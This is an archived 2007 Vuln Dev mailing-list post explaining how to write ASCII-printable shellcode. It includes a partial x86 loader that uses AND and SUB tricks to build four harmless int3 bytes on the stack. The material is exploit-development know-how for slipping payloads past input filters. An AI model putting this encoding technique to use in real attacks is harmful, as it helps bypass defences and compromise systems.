Vuln Dev
Writing ascii shellcode (\xcc) Jul 04 2007 03:43PM
lists73 skilltube com
There was a question regarding ascii shellcode development and in particular, how to get the \xcc opcode. We had a similar problem a few weeks ago and we solved it with a well-known approach documented by Steve Hanna. The example below might help others as well.

Suppose we want create the following small shellcode (just an example):

int3

int3

int3

int3

The corresponding opcodes look like the following:

\xcc\xcc\xcc\xcc

These are definitely not printable characters. However, we can write them on the fly with the following loader code (does not contain non-printable characters):

// eax == 0

and eax,454e4f4a

and eax,3a313035

// make "room" for the real shellcode

push esp

pop eax

sub eax,39393333

sub eax,72727550

sub eax,54545645 // depends on the space needed

push eax

pop esp

// write last four byte block of our shellcode

and eax,454e4f4a

and eax,3a313035

sub eax,66666666

sub eax,66666666

sub eax,66666668

push eax

//write next four byte block of our shellcode

etc.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus